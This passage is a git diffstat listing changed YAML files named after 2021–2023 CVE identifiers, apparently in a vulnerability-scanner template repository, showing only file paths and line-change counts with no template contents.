http/cves/2021/CVE-2021-41648.yaml | 5 +++-- http/cves/2021/CVE-2021-41649.yaml | 5 +++-- http/cves/2021/CVE-2021-41653.yaml | 2 +- http/cves/2021/CVE-2021-41749.yaml | 5 +++-- http/cves/2021/CVE-2021-41773.yaml | 3 ++- http/cves/2021/CVE-2021-41826.yaml | 5 +++-- http/cves/2021/CVE-2021-41878.yaml | 5 +++-- http/cves/2021/CVE-2021-4191.yaml | 4 ++-- http/cves/2021/CVE-2021-41951.yaml | 5 +++-- http/cves/2021/CVE-2021-42013.yaml | 3 ++- http/cves/2021/CVE-2021-42063.yaml | 5 +++-- http/cves/2021/CVE-2021-42071.yaml | 2 +- http/cves/2021/CVE-2021-42192.yaml | 5 +++-- http/cves/2021/CVE-2021-42237.yaml | 3 ++- http/cves/2021/CVE-2021-42551.yaml | 5 +++-- http/cves/2021/CVE-2021-42565.yaml | 5 +++-- http/cves/2021/CVE-2021-42566.yaml | 5 +++-- http/cves/2021/CVE-2021-42567.yaml | 5 +++-- http/cves/2021/CVE-2021-42627.yaml | 5 +++-- http/cves/2021/CVE-2021-42663.yaml | 5 +++-- http/cves/2021/CVE-2021-42667.yaml | 5 +++-- http/cves/2021/CVE-2021-42887.yaml | 5 +++-- http/cves/2021/CVE-2021-43062.yaml | 5 +++-- http/cves/2021/CVE-2021-43287.yaml | 5 +++-- http/cves/2021/CVE-2021-43421.yaml | 5 +++-- http/cves/2021/CVE-2021-43495.yaml | 5 +++-- http/cves/2021/CVE-2021-43496.yaml | 5 +++-- http/cves/2021/CVE-2021-43510.yaml | 5 +++-- http/cves/2021/CVE-2021-43574.yaml | 5 +++-- http/cves/2021/CVE-2021-43725.yaml | 5 +++-- http/cves/2021/CVE-2021-43734.yaml | 5 +++-- http/cves/2021/CVE-2021-43778.yaml | 5 +++-- http/cves/2021/CVE-2021-43798.yaml | 2 +- http/cves/2021/CVE-2021-43810.yaml | 5 +++-- http/cves/2021/CVE-2021-44077.yaml | 2 +- http/cves/2021/CVE-2021-44138.yaml | 5 +++-- http/cves/2021/CVE-2021-44139.yaml | 5 +++-- http/cves/2021/CVE-2021-44152.yaml | 5 +++-- http/cves/2021/CVE-2021-44427.yaml | 5 +++-- http/cves/2021/CVE-2021-44451.yaml | 5 +++-- http/cves/2021/CVE-2021-44515.yaml | 2 +- http/cves/2021/CVE-2021-44528.yaml | 5 +++-- http/cves/2021/CVE-2021-44529.yaml | 3 ++- http/cves/2021/CVE-2021-44848.yaml | 5 +++-- http/cves/2021/CVE-2021-45043.yaml | 5 +++-- http/cves/2021/CVE-2021-45046.yaml | 3 ++- http/cves/2021/CVE-2021-45092.yaml | 5 +++-- http/cves/2021/CVE-2021-45232.yaml | 2 +- http/cves/2021/CVE-2021-45380.yaml | 5 +++-- http/cves/2021/CVE-2021-45422.yaml | 5 +++-- http/cves/2021/CVE-2021-45428.yaml | 5 +++-- http/cves/2021/CVE-2021-45967.yaml | 5 +++-- http/cves/2021/CVE-2021-45968.yaml | 5 +++-- http/cves/2021/CVE-2021-46005.yaml | 5 +++-- http/cves/2021/CVE-2021-46068.yaml | 5 +++-- http/cves/2021/CVE-2021-46069.yaml | 5 +++-- http/cves/2021/CVE-2021-46071.yaml | 5 +++-- http/cves/2021/CVE-2021-46072.yaml | 5 +++-- http/cves/2021/CVE-2021-46073.yaml | 5 +++-- http/cves/2021/CVE-2021-46107.yaml | 5 +++-- http/cves/2021/CVE-2021-46379.yaml | 5 +++-- http/cves/2021/CVE-2021-46381.yaml | 5 +++-- http/cves/2021/CVE-2021-46387.yaml | 5 +++-- http/cves/2021/CVE-2021-46417.yaml | 5 +++-- http/cves/2021/CVE-2021-46422.yaml | 3 ++- http/cves/2021/CVE-2021-46424.yaml | 5 +++-- http/cves/2021/CVE-2021-46704.yaml | 3 ++- http/cves/2022/CVE-2022-0140.yaml | 7 ++++--- http/cves/2022/CVE-2022-0147.yaml | 5 +++-- http/cves/2022/CVE-2022-0148.yaml | 5 +++-- http/cves/2022/CVE-2022-0149.yaml | 5 +++-- http/cves/2022/CVE-2022-0150.yaml | 5 +++-- http/cves/2022/CVE-2022-0165.yaml | 5 +++-- http/cves/2022/CVE-2022-0169.yaml | 7 ++++--- http/cves/2022/CVE-2022-0189.yaml | 5 +++-- http/cves/2022/CVE-2022-0201.yaml | 5 +++-- http/cves/2022/CVE-2022-0206.yaml | 5 +++-- http/cves/2022/CVE-2022-0208.yaml | 5 +++-- http/cves/2022/CVE-2022-0212.yaml | 5 +++-- http/cves/2022/CVE-2022-0218.yaml | 5 +++-- http/cves/2022/CVE-2022-0220.yaml | 5 +++-- http/cves/2022/CVE-2022-0228.yaml | 5 +++-- http/cves/2022/CVE-2022-0234.yaml | 5 +++-- http/cves/2022/CVE-2022-0271.yaml | 5 +++-- http/cves/2022/CVE-2022-0281.yaml | 5 +++-- http/cves/2022/CVE-2022-0288.yaml | 5 +++-- http/cves/2022/CVE-2022-0342.yaml | 7 ++++--- http/cves/2022/CVE-2022-0346.yaml | 7 ++++--- http/cves/2022/CVE-2022-0349.yaml | 5 +++-- http/cves/2022/CVE-2022-0378.yaml | 5 +++-- http/cves/2022/CVE-2022-0381.yaml | 5 +++-- http/cves/2022/CVE-2022-0412.yaml | 5 +++-- http/cves/2022/CVE-2022-0415.yaml | 5 +++-- http/cves/2022/CVE-2022-0422.yaml | 5 +++-- http/cves/2022/CVE-2022-0432.yaml | 5 +++-- http/cves/2022/CVE-2022-0434.yaml | 5 +++-- http/cves/2022/CVE-2022-0437.yaml | 5 +++-- http/cves/2022/CVE-2022-0441.yaml | 5 +++-- http/cves/2022/CVE-2022-0482.yaml | 7 ++++--- http/cves/2022/CVE-2022-0533.yaml | 5 +++-- http/cves/2022/CVE-2022-0535.yaml | 5 +++-- http/cves/2022/CVE-2022-0540.yaml | 5 +++-- http/cves/2022/CVE-2022-0591.yaml | 5 +++-- http/cves/2022/CVE-2022-0594.yaml | 5 +++-- http/cves/2022/CVE-2022-0595.yaml | 5 +++-- http/cves/2022/CVE-2022-0597.yaml | 5 +++-- http/cves/2022/CVE-2022-0599.yaml | 5 +++-- http/cves/2022/CVE-2022-0651.yaml | 5 +++-- http/cves/2022/CVE-2022-0653.yaml | 5 +++-- http/cves/2022/CVE-2022-0656.yaml | 7 ++++--- http/cves/2022/CVE-2022-0658.yaml | 7 ++++--- http/cves/2022/CVE-2022-0660.yaml | 5 +++-- http/cves/2022/CVE-2022-0678.yaml | 5 +++-- http/cves/2022/CVE-2022-0679.yaml | 5 +++-- http/cves/2022/CVE-2022-0692.yaml | 5 +++-- http/cves/2022/CVE-2022-0693.yaml | 7 ++++--- http/cves/2022/CVE-2022-0735.yaml | 5 +++-- http/cves/2022/CVE-2022-0747.yaml | 5 +++-- http/cves/2022/CVE-2022-0760.yaml | 5 +++-- http/cves/2022/CVE-2022-0769.yaml | 7 ++++--- http/cves/2022/CVE-2022-0773.yaml | 5 +++-- http/cves/2022/CVE-2022-0776.yaml | 5 +++-- http/cves/2022/CVE-2022-0781.yaml | 7 ++++--- http/cves/2022/CVE-2022-0784.yaml | 5 +++-- http/cves/2022/CVE-2022-0785.yaml | 5 +++-- http/cves/2022/CVE-2022-0786.yaml | 5 +++-- http/cves/2022/CVE-2022-0788.yaml | 5 +++-- http/cves/2022/CVE-2022-0814.yaml | 5 +++-- http/cves/2022/CVE-2022-0817.yaml | 5 +++-- http/cves/2022/CVE-2022-0824.yaml | 5 +++-- http/cves/2022/CVE-2022-0826.yaml | 5 +++-- http/cves/2022/CVE-2022-0827.yaml | 5 +++-- http/cves/2022/CVE-2022-0846.yaml | 5 +++-- http/cves/2022/CVE-2022-0864.yaml | 5 +++-- http/cves/2022/CVE-2022-0867.yaml | 5 +++-- http/cves/2022/CVE-2022-0869.yaml | 5 +++-- http/cves/2022/CVE-2022-0870.yaml | 5 +++-- http/cves/2022/CVE-2022-0885.yaml | 5 +++-- http/cves/2022/CVE-2022-0899.yaml | 5 +++-- http/cves/2022/CVE-2022-0928.yaml | 5 +++-- http/cves/2022/CVE-2022-0948.yaml | 5 +++-- http/cves/2022/CVE-2022-0949.yaml | 5 +++-- http/cves/2022/CVE-2022-0952.yaml | 5 +++-- http/cves/2022/CVE-2022-0954.yaml | 5 +++-- http/cves/2022/CVE-2022-0963.yaml | 5 +++-- http/cves/2022/CVE-2022-0968.yaml | 5 +++-- http/cves/2022/CVE-2022-1007.yaml | 5 +++-- http/cves/2022/CVE-2022-1013.yaml | 5 +++-- http/cves/2022/CVE-2022-1020.yaml | 5 +++-- http/cves/2022/CVE-2022-1040.yaml | 2 +- http/cves/2022/CVE-2022-1054.yaml | 5 +++-- http/cves/2022/CVE-2022-1057.yaml | 5 +++-- http/cves/2022/CVE-2022-1058.yaml | 5 +++-- http/cves/2022/CVE-2022-1119.yaml | 5 +++-- http/cves/2022/CVE-2022-1162.yaml | 5 +++-- http/cves/2022/CVE-2022-1168.yaml | 5 +++-- http/cves/2022/CVE-2022-1221.yaml | 7 ++++--- http/cves/2022/CVE-2022-1329.yaml | 2 +- http/cves/2022/CVE-2022-1386.yaml | 5 +++-- http/cves/2022/CVE-2022-1388.yaml | 3 ++- http/cves/2022/CVE-2022-1390.yaml | 4 ++-- http/cves/2022/CVE-2022-1391.yaml | 7 ++++--- http/cves/2022/CVE-2022-1392.yaml | 7 ++++--- http/cves/2022/CVE-2022-1398.yaml | 5 +++-- http/cves/2022/CVE-2022-1439.yaml | 5 +++-- http/cves/2022/CVE-2022-1442.yaml | 5 +++-- http/cves/2022/CVE-2022-1574.yaml | 5 +++-- http/cves/2022/CVE-2022-1595.yaml | 5 +++-- http/cves/2022/CVE-2022-1597.yaml | 5 +++-- http/cves/2022/CVE-2022-1598.yaml | 5 +++-- http/cves/2022/CVE-2022-1713.yaml | 5 +++-- http/cves/2022/CVE-2022-1724.yaml | 5 +++-- http/cves/2022/CVE-2022-1756.yaml | 5 +++-- http/cves/2022/CVE-2022-1768.yaml | 5 +++-- http/cves/2022/CVE-2022-1815.yaml | 5 +++-- http/cves/2022/CVE-2022-1883.yaml | 5 +++-- http/cves/2022/CVE-2022-1903.yaml | 2 +- http/cves/2022/CVE-2022-1904.yaml | 5 +++-- http/cves/2022/CVE-2022-1906.yaml | 5 +++-- http/cves/2022/CVE-2022-1910.yaml | 5 +++-- http/cves/2022/CVE-2022-1916.yaml | 5 +++-- http/cves/2022/CVE-2022-1933.yaml | 5 +++-- http/cves/2022/CVE-2022-1937.yaml | 5 +++-- http/cves/2022/CVE-2022-1946.yaml | 5 +++-- http/cves/2022/CVE-2022-1952.yaml | 5 +++-- http/cves/2022/CVE-2022-2034.yaml | 5 +++-- http/cves/2022/CVE-2022-21371.yaml | 5 +++-- http/cves/2022/CVE-2022-21500.yaml | 5 +++-- http/cves/2022/CVE-2022-21587.yaml | 2 +- http/cves/2022/CVE-2022-21661.yaml | 2 +- http/cves/2022/CVE-2022-21705.yaml | 4 ++-- http/cves/2022/CVE-2022-2174.yaml | 5 +++-- http/cves/2022/CVE-2022-2185.yaml | 5 +++-- http/cves/2022/CVE-2022-2187.yaml | 5 +++-- http/cves/2022/CVE-2022-2219.yaml | 5 +++-- http/cves/2022/CVE-2022-22242.yaml | 5 +++-- http/cves/2022/CVE-2022-22536.yaml | 5 +++-- http/cves/2022/CVE-2022-22733.yaml | 5 +++-- http/cves/2022/CVE-2022-22897.yaml | 5 +++-- http/cves/2022/CVE-2022-2290.yaml | 5 +++-- http/cves/2022/CVE-2022-22947.yaml | 3 ++- http/cves/2022/CVE-2022-22954.yaml | 3 ++- http/cves/2022/CVE-2022-22963.yaml | 2 +- http/cves/2022/CVE-2022-22965.yaml | 3 ++- http/cves/2022/CVE-2022-22972.yaml | 5 +++-- http/cves/2022/CVE-2022-23102.yaml | 5 +++-- http/cves/2022/CVE-2022-23131.yaml | 5 +++-- http/cves/2022/CVE-2022-23134.yaml | 5 +++-- http/cves/2022/CVE-2022-2314.yaml | 5 +++-- http/cves/2022/CVE-2022-23178.yaml | 5 +++-- http/cves/2022/CVE-2022-23347.yaml | 5 +++-- http/cves/2022/CVE-2022-23348.yaml | 5 +++-- http/cves/2022/CVE-2022-23544.yaml | 7 ++++--- http/cves/2022/CVE-2022-2373.yaml | 5 +++-- http/cves/2022/CVE-2022-2376.yaml | 5 +++-- http/cves/2022/CVE-2022-23779.yaml | 5 +++-- http/cves/2022/CVE-2022-2379.yaml | 5 +++-- http/cves/2022/CVE-2022-23808.yaml | 5 +++-- http/cves/2022/CVE-2022-2383.yaml | 5 +++-- http/cves/2022/CVE-2022-23854.yaml | 5 +++-- http/cves/2022/CVE-2022-23881.yaml | 5 +++-- http/cves/2022/CVE-2022-23898.yaml | 5 +++-- http/cves/2022/CVE-2022-23944.yaml | 7 ++++--- http/cves/2022/CVE-2022-24112.yaml | 2 +- http/cves/2022/CVE-2022-24124.yaml | 5 +++-- http/cves/2022/CVE-2022-24129.yaml | 5 +++-- http/cves/2022/CVE-2022-2414.yaml | 5 +++-- http/cves/2022/CVE-2022-24181.yaml | 5 +++-- http/cves/2022/CVE-2022-24223.yaml | 5 +++-- http/cves/2022/CVE-2022-24260.yaml | 5 +++-- http/cves/2022/CVE-2022-24264.yaml | 5 +++-- http/cves/2022/CVE-2022-24265.yaml | 5 +++-- http/cves/2022/CVE-2022-24266.yaml | 5 +++-- http/cves/2022/CVE-2022-24288.yaml | 2 +- http/cves/2022/CVE-2022-24384.yaml | 5 +++-- http/cves/2022/CVE-2022-2462.yaml | 5 +++-- http/cves/2022/CVE-2022-2467.yaml | 5 +++-- http/cves/2022/CVE-2022-24681.yaml | 5 +++-- http/cves/2022/CVE-2022-24716.yaml | 5 +++-- http/cves/2022/CVE-2022-24816.yaml | 5 +++-- http/cves/2022/CVE-2022-24856.yaml | 5 +++-- http/cves/2022/CVE-2022-2486.yaml | 2 +- http/cves/2022/CVE-2022-2487.yaml | 3 ++- http/cves/2022/CVE-2022-2488.yaml | 5 +++-- http/cves/2022/CVE-2022-24899.yaml | 5 +++-- http/cves/2022/CVE-2022-24900.yaml | 5 +++-- http/cves/2022/CVE-2022-24990.yaml | 5 +++-- http/cves/2022/CVE-2022-25082.yaml | 5 +++-- http/cves/2022/CVE-2022-25125.yaml | 5 +++-- http/cves/2022/CVE-2022-25148.yaml | 5 +++-- http/cves/2022/CVE-2022-25149.yaml | 5 +++-- http/cves/2022/CVE-2022-25216.yaml | 5 +++-- http/cves/2022/CVE-2022-25323.yaml | 5 +++-- http/cves/2022/CVE-2022-2535.yaml | 5 +++-- http/cves/2022/CVE-2022-25356.yaml | 5 +++-- http/cves/2022/CVE-2022-2544.yaml | 5 +++-- http/cves/2022/CVE-2022-2546.yaml | 5 +++-- http/cves/2022/CVE-2022-25481.yaml | 5 +++-- http/cves/2022/CVE-2022-25485.yaml | 5 +++-- http/cves/2022/CVE-2022-25486.yaml | 5 +++-- http/cves/2022/CVE-2022-25487.yaml | 5 +++-- http/cves/2022/CVE-2022-25488.yaml | 5 +++-- http/cves/2022/CVE-2022-25489.yaml | 5 +++-- http/cves/2022/CVE-2022-25497.yaml | 5 +++-- http/cves/2022/CVE-2022-2551.yaml | 5 +++-- http/cves/2022/CVE-2022-25568.yaml | 5 +++-- http/cves/2022/CVE-2022-2599.yaml | 5 +++-- http/cves/2022/CVE-2022-26134.yaml | 2 +- http/cves/2022/CVE-2022-26138.yaml | 2 +- http/cves/2022/CVE-2022-26148.yaml | 5 +++-- http/cves/2022/CVE-2022-26159.yaml | 5 +++-- http/cves/2022/CVE-2022-26233.yaml | 5 +++-- http/cves/2022/CVE-2022-26263.yaml | 5 +++-- http/cves/2022/CVE-2022-2627.yaml | 5 +++-- http/cves/2022/CVE-2022-2633.yaml | 7 ++++--- http/cves/2022/CVE-2022-26352.yaml | 3 ++- http/cves/2022/CVE-2022-26564.yaml | 5 +++-- http/cves/2022/CVE-2022-26833.yaml | 5 +++-- http/cves/2022/CVE-2022-26960.yaml | 3 ++- http/cves/2022/CVE-2022-2733.yaml | 5 +++-- http/cves/2022/CVE-2022-2756.yaml | 5 +++-- http/cves/2022/CVE-2022-27593.yaml | 5 +++-- http/cves/2022/CVE-2022-27849.yaml | 5 +++-- http/cves/2022/CVE-2022-27926.yaml | 5 +++-- http/cves/2022/CVE-2022-27927.yaml | 5 +++-- http/cves/2022/CVE-2022-27984.yaml | 5 +++-- http/cves/2022/CVE-2022-27985.yaml | 5 +++-- http/cves/2022/CVE-2022-28022.yaml | 5 +++-- http/cves/2022/CVE-2022-28023.yaml | 5 +++-- http/cves/2022/CVE-2022-28032.yaml | 7 ++++--- http/cves/2022/CVE-2022-28079.yaml | 5 +++-- http/cves/2022/CVE-2022-28080.yaml | 5 +++-- http/cves/2022/CVE-2022-28117.yaml | 5 +++-- http/cves/2022/CVE-2022-28219.yaml | 3 ++- http/cves/2022/CVE-2022-28290.yaml | 7 ++++--- http/cves/2022/CVE-2022-28363.yaml | 5 +++-- http/cves/2022/CVE-2022-28365.yaml | 5 +++-- http/cves/2022/CVE-2022-2863.yaml | 5 +++-- http/cves/2022/CVE-2022-28923.yaml | 5 +++-- http/cves/2022/CVE-2022-28955.yaml | 5 +++-- http/cves/2022/CVE-2022-29004.yaml | 7 ++++--- http/cves/2022/CVE-2022-29005.yaml | 7 ++++--- http/cves/2022/CVE-2022-29006.yaml | 2 +- http/cves/2022/CVE-2022-29007.yaml | 2 +- http/cves/2022/CVE-2022-29009.yaml | 2 +- http/cves/2022/CVE-2022-29014.yaml | 5 +++-- http/cves/2022/CVE-2022-29078.yaml | 7 ++++--- http/cves/2022/CVE-2022-29153.yaml | 5 +++-- http/cves/2022/CVE-2022-29272.yaml | 5 +++-- http/cves/2022/CVE-2022-29298.yaml | 5 +++-- http/cves/2022/CVE-2022-29303.yaml | 5 +++-- http/cves/2022/CVE-2022-29349.yaml | 5 +++-- http/cves/2022/CVE-2022-29383.yaml | 5 +++-- http/cves/2022/CVE-2022-29455.yaml | 5 +++-- http/cves/2022/CVE-2022-29464.yaml | 3 ++- http/cves/2022/CVE-2022-29548.yaml | 7 ++++--- http/cves/2022/CVE-2022-29775.yaml | 5 +++-- http/cves/2022/CVE-2022-30073.yaml | 5 +++-- http/cves/2022/CVE-2022-30489.yaml | 5 +++-- http/cves/2022/CVE-2022-30512.yaml | 5 +++-- http/cves/2022/CVE-2022-30513.yaml | 5 +++-- http/cves/2022/CVE-2022-30514.yaml | 5 +++-- http/cves/2022/CVE-2022-30525.yaml | 3 ++- http/cves/2022/CVE-2022-3062.yaml | 5 +++-- http/cves/2022/CVE-2022-30776.yaml | 5 +++-- http/cves/2022/CVE-2022-30777.yaml | 5 +++-- http/cves/2022/CVE-2022-31126.yaml | 2 +- http/cves/2022/CVE-2022-31268.yaml | 5 +++-- http/cves/2022/CVE-2022-31269.yaml | 5 +++-- http/cves/2022/CVE-2022-31299.yaml | 5 +++-- http/cves/2022/CVE-2022-31373.yaml | 5 +++-- http/cves/2022/CVE-2022-3142.yaml | 5 +++-- http/cves/2022/CVE-2022-31474.yaml | 5 +++-- http/cves/2022/CVE-2022-31499.yaml | 5 +++-- http/cves/2022/CVE-2022-31656.yaml | 5 +++-- http/cves/2022/CVE-2022-31798.yaml | 5 +++-- http/cves/2022/CVE-2022-31814.yaml | 5 +++-- http/cves/2022/CVE-2022-31845.yaml | 5 +++-- http/cves/2022/CVE-2022-31846.yaml | 5 +++-- http/cves/2022/CVE-2022-31847.yaml | 5 +++-- http/cves/2022/CVE-2022-31854.yaml | 5 +++-- http/cves/2022/CVE-2022-31879.yaml | 5 +++-- http/cves/2022/CVE-2022-31974.yaml | 5 +++-- http/cves/2022/CVE-2022-31975.yaml | 5 +++-- http/cves/2022/CVE-2022-31976.yaml | 5 +++-- http/cves/2022/CVE-2022-31977.yaml | 5 +++-- http/cves/2022/CVE-2022-31978.yaml | 5 +++-- http/cves/2022/CVE-2022-31980.yaml | 5 +++-- http/cves/2022/CVE-2022-31981.yaml | 5 +++-- http/cves/2022/CVE-2022-31982.yaml | 5 +++-- http/cves/2022/CVE-2022-31983.yaml | 5 +++-- http/cves/2022/CVE-2022-31984.yaml | 5 +++-- http/cves/2022/CVE-2022-32007.yaml | 5 +++-- http/cves/2022/CVE-2022-32015.yaml | 5 +++-- http/cves/2022/CVE-2022-32018.yaml | 5 +++-- http/cves/2022/CVE-2022-32022.yaml | 5 +++-- http/cves/2022/CVE-2022-32024.yaml | 5 +++-- http/cves/2022/CVE-2022-32025.yaml | 5 +++-- http/cves/2022/CVE-2022-32026.yaml | 5 +++-- http/cves/2022/CVE-2022-32028.yaml | 5 +++-- http/cves/2022/CVE-2022-32094.yaml | 5 +++-- http/cves/2022/CVE-2022-32195.yaml | 5 +++-- http/cves/2022/CVE-2022-32409.yaml | 5 +++-- http/cves/2022/CVE-2022-3242.yaml | 7 ++++--- http/cves/2022/CVE-2022-32429.yaml | 5 +++-- http/cves/2022/CVE-2022-32444.yaml | 5 +++-- http/cves/2022/CVE-2022-32770.yaml | 5 +++-- http/cves/2022/CVE-2022-32771.yaml | 2 +- http/cves/2022/CVE-2022-32772.yaml | 2 +- http/cves/2022/CVE-2022-33119.yaml | 5 +++-- http/cves/2022/CVE-2022-33174.yaml | 5 +++-- http/cves/2022/CVE-2022-33891.yaml | 2 +- http/cves/2022/CVE-2022-33901.yaml | 5 +++-- http/cves/2022/CVE-2022-33965.yaml | 5 +++-- http/cves/2022/CVE-2022-34045.yaml | 5 +++-- http/cves/2022/CVE-2022-34046.yaml | 5 +++-- http/cves/2022/CVE-2022-34047.yaml | 5 +++-- http/cves/2022/CVE-2022-34048.yaml | 5 +++-- http/cves/2022/CVE-2022-34049.yaml | 5 +++-- http/cves/2022/CVE-2022-34093.yaml | 5 +++-- http/cves/2022/CVE-2022-34094.yaml | 5 +++-- http/cves/2022/CVE-2022-34121.yaml | 5 +++-- http/cves/2022/CVE-2022-34328.yaml | 5 +++-- http/cves/2022/CVE-2022-34576.yaml | 5 +++-- http/cves/2022/CVE-2022-34590.yaml | 5 +++-- http/cves/2022/CVE-2022-34753.yaml | 2 +- http/cves/2022/CVE-2022-3484.yaml | 5 +++-- http/cves/2022/CVE-2022-3506.yaml | 5 +++-- http/cves/2022/CVE-2022-35151.yaml | 5 +++-- http/cves/2022/CVE-2022-35405.yaml | 3 ++- http/cves/2022/CVE-2022-35413.yaml | 5 +++-- http/cves/2022/CVE-2022-35416.yaml | 5 +++-- http/cves/2022/CVE-2022-35493.yaml | 5 +++-- http/cves/2022/CVE-2022-3578.yaml | 5 +++-- http/cves/2022/CVE-2022-35914.yaml | 4 ++-- http/cves/2022/CVE-2022-36446.yaml | 2 +- http/cves/2022/CVE-2022-36537.yaml | 5 +++-- http/cves/2022/CVE-2022-36553.yaml | 5 +++-- http/cves/2022/CVE-2022-36642.yaml | 5 +++-- http/cves/2022/CVE-2022-36804.yaml | 5 +++-- http/cves/2022/CVE-2022-36883.yaml | 5 +++-- http/cves/2022/CVE-2022-37042.yaml | 3 ++- http/cves/2022/CVE-2022-37153.yaml | 5 +++-- http/cves/2022/CVE-2022-37190.yaml | 5 +++-- http/cves/2022/CVE-2022-37191.yaml | 5 +++-- http/cves/2022/CVE-2022-37299.yaml | 5 +++-- http/cves/2022/CVE-2022-3768.yaml | 5 +++-- http/cves/2022/CVE-2022-3800.yaml | 5 +++-- http/cves/2022/CVE-2022-38295.yaml | 5 +++-- http/cves/2022/CVE-2022-38296.yaml | 5 +++-- http/cves/2022/CVE-2022-38463.yaml | 5 +++-- http/cves/2022/CVE-2022-38467.yaml | 5 +++-- http/cves/2022/CVE-2022-38553.yaml | 5 +++-- http/cves/2022/CVE-2022-38637.yaml | 5 +++-- http/cves/2022/CVE-2022-38794.yaml | 5 +++-- http/cves/2022/CVE-2022-38817.yaml | 5 +++-- http/cves/2022/CVE-2022-38870.yaml | 5 +++-- http/cves/2022/CVE-2022-39048.yaml | 5 +++-- http/cves/2022/CVE-2022-3908.yaml | 5 +++-- http/cves/2022/CVE-2022-39195.yaml | 5 +++-- http/cves/2022/CVE-2022-3933.yaml | 5 +++-- http/cves/2022/CVE-2022-3934.yaml | 5 +++-- http/cves/2022/CVE-2022-3980.yaml | 5 +++-- http/cves/2022/CVE-2022-3982.yaml | 5 +++-- http/cves/2022/CVE-2022-39952.yaml | 5 +++-- http/cves/2022/CVE-2022-39960.yaml | 5 +++-- http/cves/2022/CVE-2022-39986.yaml | 5 +++-- http/cves/2022/CVE-2022-40022.yaml | 5 +++-- http/cves/2022/CVE-2022-40032.yaml | 5 +++-- http/cves/2022/CVE-2022-40047.yaml | 5 +++-- http/cves/2022/CVE-2022-40083.yaml | 5 +++-- http/cves/2022/CVE-2022-40127.yaml | 5 +++-- http/cves/2022/CVE-2022-40359.yaml | 5 +++-- http/cves/2022/CVE-2022-4049.yaml | 5 +++-- http/cves/2022/CVE-2022-4050.yaml | 5 +++-- http/cves/2022/CVE-2022-4057.yaml | 5 +++-- http/cves/2022/CVE-2022-4059.yaml | 5 +++-- http/cves/2022/CVE-2022-4060.yaml | 5 +++-- http/cves/2022/CVE-2022-4063.yaml | 5 +++-- http/cves/2022/CVE-2022-40684.yaml | 2 +- http/cves/2022/CVE-2022-40734.yaml | 5 +++-- http/cves/2022/CVE-2022-40843.yaml | 5 +++-- http/cves/2022/CVE-2022-40879.yaml | 5 +++-- http/cves/2022/CVE-2022-40881.yaml | 5 +++-- http/cves/2022/CVE-2022-4117.yaml | 5 +++-- http/cves/2022/CVE-2022-4140.yaml | 5 +++-- http/cves/2022/CVE-2022-41441.yaml | 5 +++-- http/cves/2022/CVE-2022-41473.yaml | 5 +++-- http/cves/2022/CVE-2022-41840.yaml | 5 +++-- http/cves/2022/CVE-2022-42094.yaml | 5 +++-- http/cves/2022/CVE-2022-42095.yaml | 5 +++-- http/cves/2022/CVE-2022-42096.yaml | 7 ++++--- http/cves/2022/CVE-2022-42233.yaml | 5 +++-- http/cves/2022/CVE-2022-4260.yaml | 5 +++-- http/cves/2022/CVE-2022-42746.yaml | 5 +++-- http/cves/2022/CVE-2022-42747.yaml | 5 +++-- http/cves/2022/CVE-2022-42748.yaml | 5 +++-- http/cves/2022/CVE-2022-42749.yaml | 5 +++-- http/cves/2022/CVE-2022-4295.yaml | 5 +++-- http/cves/2022/CVE-2022-4301.yaml | 5 +++-- http/cves/2022/CVE-2022-43014.yaml | 5 +++-- http/cves/2022/CVE-2022-43015.yaml | 5 +++-- http/cves/2022/CVE-2022-43016.yaml | 5 +++-- http/cves/2022/CVE-2022-43017.yaml | 5 +++-- http/cves/2022/CVE-2022-43018.yaml | 5 +++-- http/cves/2022/CVE-2022-4305.yaml | 5 +++-- http/cves/2022/CVE-2022-4306.yaml | 5 +++-- http/cves/2022/CVE-2022-43140.yaml | 5 +++-- http/cves/2022/CVE-2022-43164.yaml | 5 +++-- http/cves/2022/CVE-2022-43165.yaml | 5 +++-- http/cves/2022/CVE-2022-43166.yaml | 5 +++-- http/cves/2022/CVE-2022-43167.yaml | 5 +++-- http/cves/2022/CVE-2022-43169.yaml | 5 +++-- http/cves/2022/CVE-2022-43170.yaml | 5 +++-- http/cves/2022/CVE-2022-43185.yaml | 5 +++-- http/cves/2022/CVE-2022-4320.yaml | 5 +++-- http/cves/2022/CVE-2022-4321.yaml | 5 +++-- http/cves/2022/CVE-2022-4325.yaml | 5 +++-- http/cves/2022/CVE-2022-4328.yaml | 7 ++++--- http/cves/2022/CVE-2022-43769.yaml | 7 ++++--- http/cves/2022/CVE-2022-44290.yaml | 5 +++-- http/cves/2022/CVE-2022-44291.yaml | 5 +++-- http/cves/2022/CVE-2022-4447.yaml | 5 +++-- http/cves/2022/CVE-2022-44944.yaml | 5 +++-- http/cves/2022/CVE-2022-44946.yaml | 5 +++-- http/cves/2022/CVE-2022-44947.yaml | 5 +++-- http/cves/2022/CVE-2022-44948.yaml | 5 +++-- http/cves/2022/CVE-2022-44949.yaml | 5 +++-- http/cves/2022/CVE-2022-44950.yaml | 5 +++-- http/cves/2022/CVE-2022-44951.yaml | 5 +++-- http/cves/2022/CVE-2022-44952.yaml | 5 +++-- http/cves/2022/CVE-2022-44957.yaml | 5 +++-- http/cves/2022/CVE-2022-45037.yaml | 5 +++-- http/cves/2022/CVE-2022-45038.yaml | 5 +++-- http/cves/2022/CVE-2022-45805.yaml | 1 + http/cves/2022/CVE-2022-45917.yaml | 5 +++-- http/cves/2022/CVE-2022-45933.yaml | 5 +++-- http/cves/2022/CVE-2022-46020.yaml | 5 +++-- http/cves/2022/CVE-2022-46071.yaml | 7 ++++--- http/cves/2022/CVE-2022-46073.yaml | 5 +++-- http/cves/2022/CVE-2022-46169.yaml | 5 +++-- http/cves/2022/CVE-2022-46381.yaml | 5 +++-- http/cves/2022/CVE-2022-46443.yaml | 5 +++-- http/cves/2022/CVE-2022-46463.yaml | 5 +++-- http/cves/2022/CVE-2022-46888.yaml | 5 +++-- http/cves/2022/CVE-2022-46934.yaml | 5 +++-- http/cves/2022/CVE-2022-47002.yaml | 5 +++-- http/cves/2022/CVE-2022-47003.yaml | 5 +++-- http/cves/2022/CVE-2022-47075.yaml | 5 +++-- http/cves/2022/CVE-2022-47615.yaml | 5 +++-- http/cves/2022/CVE-2022-47945.yaml | 5 +++-- http/cves/2022/CVE-2022-47966.yaml | 5 +++-- http/cves/2022/CVE-2022-47986.yaml | 5 +++-- http/cves/2022/CVE-2022-48012.yaml | 5 +++-- http/cves/2022/CVE-2022-48165.yaml | 5 +++-- http/cves/2022/CVE-2022-48197.yaml | 5 +++-- http/cves/2022/CVE-2022-4897.yaml | 5 +++-- http/cves/2023/CVE-2023-0099.yaml | 5 +++-- http/cves/2023/CVE-2023-0126.yaml | 7 